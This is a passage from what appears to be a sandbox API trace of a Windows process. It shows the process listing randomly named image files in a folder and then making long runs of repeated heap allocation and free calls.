ftCreationTime.dwLowDateTime=0x7577ecb0, ftCreationTime.dwHighDateTime=0x1d5ba3e, ftLastAccessTime.dwLowDateTime=0x7d44d710, ftLastAccessTime.dwHighDateTime=0x1d5beb1, ftLastWriteTime.dwLowDateTime=0x7d44d710, ftLastWriteTime.dwHighDateTime=0x1d5beb1, nFileSizeHigh=0x0, nFileSizeLow=0xc82f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oTut6glq e.png", cAlternateFileName="OTUT6G~1.PNG")) returned 1 [0094.281] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f30b290, ftCreationTime.dwHighDateTime=0x1d5beb9, ftLastAccessTime.dwLowDateTime=0x76835110, ftLastAccessTime.dwHighDateTime=0x1d5bd92, ftLastWriteTime.dwLowDateTime=0x76835110, ftLastWriteTime.dwHighDateTime=0x1d5bd92, nFileSizeHigh=0x0, nFileSizeLow=0x1364a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qxpM.bmp", cAlternateFileName="")) returned 1 [0094.281] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3400830, ftCreationTime.dwHighDateTime=0x1d5bd9f, ftLastAccessTime.dwLowDateTime=0x491a86d0, ftLastAccessTime.dwHighDateTime=0x1d5bae5, ftLastWriteTime.dwLowDateTime=0x491a86d0, ftLastWriteTime.dwHighDateTime=0x1d5bae5, nFileSizeHigh=0x0, nFileSizeLow=0x5320, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="r5xI0I6PQENX7m.gif", cAlternateFileName="R5XI0I~1.GIF")) returned 1 [0094.281] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5e5adb0, ftCreationTime.dwHighDateTime=0x1d5bc83, ftLastAccessTime.dwLowDateTime=0x704fe190, ftLastAccessTime.dwHighDateTime=0x1d5bac3, ftLastWriteTime.dwLowDateTime=0x704fe190, ftLastWriteTime.dwHighDateTime=0x1d5bac3, nFileSizeHigh=0x0, nFileSizeLow=0x10d04, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R6HVEfAHabx.png", cAlternateFileName="R6HVEF~1.PNG")) returned 1 [0094.281] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5381afa0, ftCreationTime.dwHighDateTime=0x1d5b58a, ftLastAccessTime.dwLowDateTime=0xd60f7570, ftLastAccessTime.dwHighDateTime=0x1d5b9ee, ftLastWriteTime.dwLowDateTime=0xd60f7570, ftLastWriteTime.dwHighDateTime=0x1d5b9ee, nFileSizeHigh=0x0, nFileSizeLow=0xe761, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sedQsW54hh3wTvzgi.gif", cAlternateFileName="SEDQSW~1.GIF")) returned 1 [0094.281] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc9f12c0, ftCreationTime.dwHighDateTime=0x1d5b6c4, ftLastAccessTime.dwLowDateTime=0x7246c50, ftLastAccessTime.dwHighDateTime=0x1d5c382, ftLastWriteTime.dwLowDateTime=0x7246c50, ftLastWriteTime.dwHighDateTime=0x1d5c382, nFileSizeHigh=0x0, nFileSizeLow=0x96f9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uP81S.jpg", cAlternateFileName="")) returned 1 [0094.281] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b79c9f0, ftCreationTime.dwHighDateTime=0x1d5c142, ftLastAccessTime.dwLowDateTime=0xa6a30040, ftLastAccessTime.dwHighDateTime=0x1d5bec6, ftLastWriteTime.dwLowDateTime=0xa6a30040, ftLastWriteTime.dwHighDateTime=0x1d5bec6, nFileSizeHigh=0x0, nFileSizeLow=0xf3eb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zj3vAJ-ez.bmp", cAlternateFileName="ZJ3VAJ~1.BMP")) returned 1 [0094.281] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7efb8ce0, ftCreationTime.dwHighDateTime=0x1d5ba81, ftLastAccessTime.dwLowDateTime=0x37cdb3b0, ftLastAccessTime.dwHighDateTime=0x1d5b659, ftLastWriteTime.dwLowDateTime=0x37cdb3b0, ftLastWriteTime.dwHighDateTime=0x1d5b659, nFileSizeHigh=0x0, nFileSizeLow=0x11197, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_FuF.gif", cAlternateFileName="")) returned 1 [0094.281] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7efb8ce0, ftCreationTime.dwHighDateTime=0x1d5ba81, ftLastAccessTime.dwLowDateTime=0x37cdb3b0, ftLastAccessTime.dwHighDateTime=0x1d5b659, ftLastWriteTime.dwLowDateTime=0x37cdb3b0, ftLastWriteTime.dwHighDateTime=0x1d5b659, nFileSizeHigh=0x0, nFileSizeLow=0x11197, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_FuF.gif", cAlternateFileName="")) returned 0 [0094.281] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33172f8 | out: hHeap=0x630000) returned 1 [0094.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318138 | out: hHeap=0x630000) returned 1 [0094.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce478 [0094.281] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0094.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.285] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.285] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.285] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.285] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.285] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.285] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.285] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.285] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.285] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.285] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.285] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.285] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.285] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.285] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.285] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.285] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.285] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.285] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.285] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0094.285] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.285] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.285] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.285] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.285] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.285] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.285] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.285] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.287] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.287] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.287] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.287] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.287] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.287] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.287] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.287] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.287] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.287] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.287] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.287] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.287] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.287] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.287] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.287] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.287] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.287] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.287] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.287] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.287] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.287] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.287] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.287] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.287] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.287] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.287] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.287] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.287] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.287] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.287] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.287] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.287] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.288] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.288] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.288] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.288] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.288] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.288] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.288] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.288] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.288] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.288] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.288] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.288] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.288] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce138 | out: hHeap=0x630000) returned 1 [0094.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.288] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 